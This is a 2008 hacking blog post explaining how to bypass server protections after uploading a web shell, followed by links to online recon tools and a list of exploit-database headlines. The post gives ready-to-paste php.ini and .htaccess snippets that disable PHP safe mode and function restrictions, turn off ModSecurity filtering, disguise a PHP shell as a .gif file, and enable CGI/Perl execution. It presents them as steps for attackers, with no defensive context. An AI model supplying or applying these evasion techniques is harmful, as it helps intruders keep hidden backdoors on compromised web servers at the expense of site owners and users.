Bypassing Shell Security

Home / Hacking, News, Security / Bypassing Shell Security

October 28, 2008 PlanetCreator 0 Comments 0 tags

Safemode = On (Secure)
Disables Functions =
dl, passthru, proc_open, proc_nice, proc_terminate, proc_get_status, proc_close, pfsockopen, leak, apache_child_terminate, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid, posix_setuid
================

Create A File “Php.ini” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
———————
Paste This
———————
safe_mode = OFF
disable_functions = NONE
———————

================
ModSecurity = On
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload And Open Your Shell From There
————————
Paste This
————————
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
————————

================
Hiding Your Shell
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
But Change File Extension To .gif (You Can Use Any Other extension But Change .gif In .htaccess To Extension You Chose) Then Open Your Shell From There
————————
Paste This
————————
AddType application/x-httpd-php .gif
————————

================
Activate Perl And CGI
================

Create A File “.htaccess” In Some Writeable Folder (777) Then Upload Your Shell There
————————
Paste This
————————
Options ExecCGI
AddType application/x-httpd-cgi .pl
AddHandler cgi-script .pl
————————

Explore More

Online Services

Gathering information: (set) http://www.subnetonline.com/ (set) http://ping.eu/ (ping, dns_tools, traceroute, web_tools) http://serversniff.net/ (DIG / nslookup, whois, traceroute) http://networking.ringofsaturn.com/Tools/ (whois, dns_tools, service_scan, traceroute) http://centralops.net/co/DomainDossier.aspx (whois, dns_tools, domain_search) http://www.whois.ws/ (whois, dns_tools) http://www.robtex.com/ (whois)

Critical SQL Injection in Planet Myannar Website and Forum

PlanetCreator has reported another critical SQL Injection (vulnerability) onÂ Planet Myannar Website and Forum http://www.planet.com.mm/ Powered by Inforithm-Maze. SQL injection is a code injection technique that exploits a security vulnerability

DNS disaster: first attacks reported

The first attacks that are likely to have stemmed from a serious Domain Name System flaw have been reported. Dan Kaminsky (Credit: Kaminsky’s blog) The existence of the Domain Name

[webapps] Lingdang CRM 8.6.4.7 - SQL Injection
on August 26, 2025 at 12:00 am
Lingdang CRM 8.6.4.7 - SQL Injection
[remote] Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass
on August 26, 2025 at 12:00 am
Ivanti Endpoint Manager Mobile 12.5.0.0 - Authentication Bypass
[webapps] Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
on August 26, 2025 at 12:00 am
Birth Chart Compatibility WordPress Plugin 2.0 - Full Path Disclosure
[webapps] StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload
on August 26, 2025 at 12:00 am
StoryChief Wordpress Plugin 1.0.42 - Arbitrary File Upload
[local] GeoVision ASManager Windows Application 6.1.2.0 - Credentials Disclosure
on August 26, 2025 at 12:00 am
GeoVision ASManager Windows Application 6.1.2.0 - Credentials Disclosure